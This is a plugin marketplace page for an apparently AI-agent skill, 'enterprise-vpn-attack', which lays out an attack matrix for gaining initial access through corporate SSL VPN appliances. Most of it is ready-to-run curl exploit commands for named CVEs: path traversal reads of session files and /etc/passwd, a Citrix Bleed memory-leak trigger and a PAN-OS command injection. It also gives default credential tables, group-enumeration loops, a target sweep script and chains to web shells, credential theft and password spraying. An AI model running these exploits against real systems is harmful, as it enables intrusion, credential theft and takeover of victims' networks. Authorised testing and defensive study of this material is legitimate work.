Stats
Actions
Tags
Help us improve
Share bugs, ideas, or general feedback.
From claude-bughunter
Attack matrix for external SSL VPN appliances (Cisco, Fortinet, Citrix, Palo Alto, Ivanti, SonicWall, F5). Covers fingerprinting, CVE lookup, default creds, config disclosure, and pre-auth exploits for initial access.
npx claudepluginhub elementalsouls/claude-bughunterHow this skill is triggered — by the user, by Claude, or both
Slash command
/claude-bughunter:enterprise-vpn-attackThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
Trigger when recon surfaces:
External attack matrix for VMware vCenter/vSphere/Workspace ONE/Aria: version fingerprinting, high-impact CVE chain, default creds, SSO disclosure, LDAP enumeration. Use when recon shows vCenter on port 443.
Network infrastructure for self-hosted environments: VLANs, firewalls (nftables, OPNsense, pfSense), DNS (Pi-hole, AdGuard Home, split-horizon), reverse proxies (Caddy, Traefik, Nginx Proxy Manager), VPN (WireGuard, Tailscale), TLS/SSL certificate management, DHCP, and security hardening. Invoke when task involves any interaction with network configuration — designing, implementing, debugging, reviewing, or planning network architecture.
References 100 critical web vulnerabilities by category with definitions, root causes, impacts, and mitigations. Useful for web security audits, testing, and remediation.
Share bugs, ideas, or general feedback.
Trigger when recon surfaces:
*.<client>.example/+CSCOE+/logon.html or similar +CSCOE+ paths → Cisco ASA / AnyConnectintranet.* / vpn.* / connect.* / webvpn.* / wc.* / remote.* subdomainsServer: Apache or banner like "AnyConnect", "FortiGate", "NetScaler", "GlobalProtect", "Pulse", "Ivanti"Set-Cookie: webvpn= (Cisco) / SVPNCOOKIE= (Fortinet) / NSC_AAA= (Citrix) / DSAuthSession= (Pulse) / BIGipServer* (F5)DO NOT use for:
curl -skI 'https://target/+CSCOE+/logon.html' | head -10
# Look for: Set-Cookie: webvpn=; X-Frame-Options: SAMEORIGIN; CSP: ... block-all-mixed-content
# Login page contains: "AnyConnect", "CSCOE", "logon.html"
ASA version: not banner-disclosed in modern builds; need to derive from JS file paths or test specific paths.
# Path-based version hints (older builds leaked builds in URLs)
curl -sk 'https://target/+CSCOE+/sdesktop/scan-finalize?path=test'
curl -sk 'https://target/+CSCOE+/saml/sp/metadata' # 200 = SAML auth enabled
curl -sk 'https://target/CSCOSSLC/config-auth' # AnyConnect handshake endpoint
curl -skI 'https://target/remote/login' | head -10
# Look for: Set-Cookie: SVPNCOOKIE=, Server header missing or "xxxxxxxx-xxxxx"
# Login page contains: "FortiGate", "Fortinet", "SSL-VPN"
Version: /remote/info sometimes leaks (older), or /login?username= 302 response
curl -skI 'https://target/' | head -10
# Look for: Set-Cookie: NSC_AAA=, Set-Cookie: NSC_USER=, Server: NetScaler
# Login page contains: "NetScaler", "Citrix Gateway"
# Version banner
curl -sk 'https://target/vpn/index.html' | grep -oE 'NetScaler/[0-9.]+|NS[0-9.]+'
curl -sk 'https://target/menu/neo' # 200 if vulnerable to CVE-2019-19781 era
curl -skI 'https://target/global-protect/login.esp' | head -10
# Look for: Set-Cookie: PHPSESSID= (yes, GP uses PHP), Server: Apache (PA-VM internal)
# Page contains: "GlobalProtect Portal", "PAN-OS"
# Version banner via login page
curl -sk 'https://target/global-protect/login.esp' | grep -oE 'GlobalProtect Portal[\s\S]{0,200}'
# Or check meta tag
curl -sk 'https://target/global-protect/login.esp' | grep -oE 'panui-[0-9.]+'
curl -skI 'https://target/dana-na/auth/url_default/welcome.cgi' | head -10
# Look for: Set-Cookie: DSAuthSession=, DSPREAUTH=
# Page contains: "Pulse Secure" or "Ivanti Connect Secure"
# Version
curl -sk 'https://target/dana-na/auth/url_default/welcome.cgi' | grep -oE 'Pulse Connect Secure[^<]*|ivanti[^<]*[0-9.]+'
curl -skI 'https://target/cgi-bin/welcome' | head -10
# Look for: Set-Cookie: swap=, swapauth=
# Page contains: "SonicWall", "NetExtender", "SMA"
curl -skI 'https://target/my.policy' | head -10
# Look for: Set-Cookie: BIGipServer*, MRHSession=
# Server: BIG-IP (sometimes)
| CVE | Affects | Type | Test |
|---|---|---|---|
| CVE-2018-0296 | ASA pre-9.x specific builds | Path traversal — info disclosure (sessions, config) | GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua |
| CVE-2020-3452 | ASA, FTD before specific patch levels | Path traversal — file read | GET /+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest+/+CSCOT+/lua/test.lua and variations |
| CVE-2023-20269 | ASA, FTD specific | Auth bypass on SSL VPN | Brute-force a group + valid creds combo against /+webvpn+/index.html |
| CVE-2024-20481 | RAVPN | DoS via crafted handshake | SKIP in red team — disruptive |
# Cisco CVE-2020-3452 — file read
curl -sk 'https://target/+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest+/+CSCOT+/lua/test.lua' | head -5
# Cisco CVE-2018-0296 — path traversal
curl -sk 'https://target/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua' | head -20
# Files commonly retrievable on vulnerable ASA:
# /+CSCOE+/portal_inc.lua (portal inclusions — may reveal local users)
# /+CSCOE+/session_password.html
# /+CSCOE+/files/files.html
| CVE | Affects | Type | Test |
|---|---|---|---|
| CVE-2018-13379 | FortiOS 5.4-6.0 | Path traversal — sslvpn_websession file read | GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession |
| CVE-2022-42475 | FortiOS 7.x specific | Heap overflow — pre-auth RCE | Complex exploit; test with nuclei template CVE-2022-42475 |
| CVE-2023-27997 (XORtigate) | FortiOS various | Heap overflow — pre-auth RCE | Public PoCs exist; nuclei template available |
| CVE-2024-21762 | FortiOS 6.x-7.x | OOB write — pre-auth RCE | Public PoC; nuclei template CVE-2024-21762 |
| CVE-2024-55591 | FortiOS 7.0-7.4 | Auth bypass on FortiOS Node.js websocket admin interface | GET /endpoint on admin-interface port |
# Fortinet CVE-2018-13379 — most reliably-fingerprintable file read
curl -sk --path-as-is 'https://target/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
# Response contains plaintext usernames + sessions if vulnerable
# Fortinet credential dump format (from CVE-2018-13379 dumps that hit pastebin in 2021):
# IP:PORT username password (and others)
| CVE | Affects | Type | Test |
|---|---|---|---|
| CVE-2019-19781 (Shitrix) | ADC/Gateway 10.5-13.0 specific | Path traversal → RCE via XML upload | GET /vpn/../vpns/cfg/smb.conf |
| CVE-2022-27518 | ADC/Gateway with SAML configured | Pre-auth RCE | Complex; test with nuclei |
| CVE-2023-3519 | NetScaler ADC/Gateway 13.0-13.1 specific | Pre-auth RCE via crafted HTTP | Public PoCs exist |
| CVE-2023-4966 (Citrix Bleed) | NetScaler ADC/Gateway 13.0-14.1 | Memory disclosure → session token theft | POST /oauth/idp/.well-known/openid-configuration with crafted Host header — long Host header triggers memory leak in response |
# Citrix Bleed (CVE-2023-4966) detection
HOST=$(python3 -c "print('A' * 24812)")
curl -sk -X POST -H "Host: $HOST" "https://target/oauth/idp/.well-known/openid-configuration" -o response.txt
# If response is large (>10KB) and contains random memory contents — vulnerable
# Session tokens often present in the memory dump
# CVE-2019-19781 file read
curl -sk --path-as-is 'https://target/vpn/../vpns/cfg/smb.conf'
| CVE | Affects | Type | Test |
|---|---|---|---|
| CVE-2024-3400 | PAN-OS 10.2-11.1 with GP enabled | Command injection — pre-auth RCE | POST /ssl-vpn/login.esp with crafted Cookie header containing SESSID=../../../var/log/pan/test.txt |
# CVE-2024-3400 detection
curl -sk -X POST 'https://target/ssl-vpn/login.esp' \
-H 'Cookie: SESSID=../../../var/log/pan/test_$(id)_test.txt' \
--data 'jsessionid=test'
# Look for file-creation side-effect on test path — palo creates file with command output
| CVE | Affects | Type | Test |
|---|---|---|---|
| CVE-2019-11510 | Pulse Connect Secure 8.x-9.x | Arbitrary file read | GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ |
| CVE-2021-22893 | Pulse Connect Secure 9.x | Pre-auth RCE | Complex multi-step; test with nuclei |
| CVE-2024-21887 | Ivanti Connect Secure 9.1-22.6 | Command injection on web component | POST /api/v1/totp/user-backup-code/ with crafted body |
| CVE-2023-46805 | Ivanti Connect Secure 9.1-22.6 | Auth bypass | Combined with 21887 for full chain |
# CVE-2019-11510 — Pulse file read
curl -sk --path-as-is 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/'
| CVE | Affects | Type | Test |
|---|---|---|---|
| CVE-2021-20016 | SMA 100 series specific firmware | SQL injection — pre-auth | nuclei template available |
| CVE-2024-40766 | SonicOS specific | Access-control flaw | Specific firmware versions |
Most enterprise VPNs now use SAML for SSO. Check SP metadata:
# Cisco ASA
curl -sk 'https://target/+CSCOE+/saml/sp/metadata' | head -50
# Fortinet
curl -sk 'https://target/remote/saml/metadata' | head -50
# Citrix
curl -sk 'https://target/saml/login' | head -30
Look for:
AuthnRequestsSigned="false" → see hunt-saml for XSW exploitationWantAssertionsSigned="false" → severe; assertion-replay possible| Vendor | User | Password | Notes |
|---|---|---|---|
| Cisco ASA | admin | cisco | Default factory; rarely seen in prod |
| Cisco ASA | enable_15 | cisco | Console |
| Fortinet | admin | (empty) | Factory default |
| Citrix NetScaler | nsroot | nsroot | Factory default |
| Citrix NetScaler | nsroot | (serial number) | Newer firmware |
| Palo Alto | admin | admin | Factory default |
| Pulse Secure | admin | password | Factory; CIS-hardened changes this |
| F5 Big-IP | root | default | Factory |
| F5 Big-IP | admin | admin | Common alternate |
| SonicWall | admin | password | Factory |
⚠ Most enterprise targets have changed these. Test ≤2 attempts per account to avoid lockout.
Cisco ASA AAA groups can sometimes be enumerated without auth.
# Tunnel group enumeration via timing
for group in DefaultRAGroup DefaultWEBVPNGroup SSLVPN Employees Contractors Vendors Partners Sales Marketing IT; do
ms=$(curl -sk --max-time 10 -o /dev/null -w "%{time_total}" \
-X POST "https://target/+webvpn+/index.html" \
-d "username=test&password=test&group_list=$group&tgroup=&Login=Login")
echo "$group: ${ms}s"
done
# Larger differential timing = group exists; valid groups respond slower in some builds
After auth fails, look at error response details:
| Pattern in response | AAA backend |
|---|---|
a0=2 (Cisco) | Unknown user |
a0=3 (Cisco) | Wrong password |
a0=4 (Cisco) | Login restricted |
a0=12 (Cisco) | Account locked |
a0=115 (Cisco) | Generic auth fail (LDAP/RADIUS/AD layer error) |
| AADSTS in response body | Backed by Entra (SAML) |
Authentication failed via RADIUS | RADIUS backend |
Invalid username or password (generic) | LDAP or local DB |
If you see SAML/Entra in the flow, pivot to m365-entra-attack skill for cred-spray strategy.
TARGET="vpn.target.com"
# Cisco
curl -skI "https://$TARGET/+CSCOE+/logon.html" 2>&1 | head -3
curl -sk "https://$TARGET/+CSCOE+/saml/sp/metadata" -o /tmp/cisco_saml.xml; ls -la /tmp/cisco_saml.xml
curl -sk --path-as-is "https://$TARGET/+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest" -o /tmp/cisco_cve.html
# Fortinet
curl -skI "https://$TARGET/remote/login" 2>&1 | head -3
curl -sk --path-as-is "https://$TARGET/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -o /tmp/forti_cve.txt; head -c 200 /tmp/forti_cve.txt
# Citrix
curl -skI "https://$TARGET/" 2>&1 | head -3
curl -sk --path-as-is "https://$TARGET/vpn/../vpns/cfg/smb.conf" -o /tmp/citrix_cve.txt; head -c 200 /tmp/citrix_cve.txt
HOST=$(python3 -c "print('A' * 24812)")
curl -sk -X POST -H "Host: $HOST" "https://$TARGET/oauth/idp/.well-known/openid-configuration" -o /tmp/citrix_bleed.txt
wc -c /tmp/citrix_bleed.txt
# Palo Alto
curl -skI "https://$TARGET/global-protect/login.esp" 2>&1 | head -3
# Pulse / Ivanti
curl -skI "https://$TARGET/dana-na/auth/url_default/welcome.cgi" 2>&1 | head -3
curl -sk --path-as-is "https://$TARGET/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" -o /tmp/pulse_cve.txt; head -c 200 /tmp/pulse_cve.txt
Nuclei has high-quality templates for most of the above CVEs. Single command sweeps:
nuclei -u https://target/ \
-tags vpn,cisco-asa,fortinet,citrix,palo-alto,pulse-secure,sonicwall,f5 \
-severity high,critical -rl 5
Add -as (auto-scan) for broader vuln coverage but slower.
m365-entra-attack — when AAA backend is Entra SAML; cred-spray strategy carries overhunt-saml — XSW / signature-stripping if SAML SP is misconfiguredmid-engagement-ir-detection — appliances generate noisy logs; watch for IPS rules being deployed mid-engagementredteam-mindset — banner-stripped ≠ "not vulnerable"; keep digging via behavioral fingerprintshunt-rce — Every major VPN appliance (Pulse Secure, Fortinet, Citrix, Ivanti, Palo Alto) has shipped pre-auth path-traversal-to-RCE in the last 24 months. Chain primitive: VPN appliance CVE (e.g., Ivanti ICS CVE-2024-21887, Citrix Bleed CVE-2023-4966, Fortinet CVE-2024-21762) → hunt-rce pre-auth path traversal → arbitrary file write into web-root → request the file → web-shell as root → VPN config + LDAP bind credentials extracted.hunt-saml — VPN SAML SP misconfig persists even on fully-patched appliances. Chain primitive: appliance patched against latest CVE but /saml/metadata reachable → IdP fingerprinted → hunt-saml XSW or comment-injection against IdP → forged assertion → VPN session established without password/MFA.vmware-vcenter-attack — Post-VPN-foothold the natural next pivot is vCenter. Chain primitive: VPN web-shell → cred extraction from VPN appliance config (LDAP bind, RADIUS shared secret) → reuse against internal vCenter → if scope permits, vmware-vcenter-attack → datacenter takeover.hunt-ntlm-info — Some VPN appliances expose anonymous NTLM on management paths. Chain primitive: VPN admin portal NTLM Type-2 capture → hunt-ntlm-info AV_PAIR decode → internal AD forest name → m365-entra-attack Entra spray on synced tenant.mid-engagement-ir-detection + redteam-report-template — VPN appliance CVE exploitation is high-noise; SOC patches fast. Chain primitive: confirmed CVE → baseline capture via mid-engagement-ir-detection → if appliance updates mid-test, capture the patched-state as a SECOND finding → run both findings through triage-validation → package via redteam-report-template with explicit critical-infrastructure framing.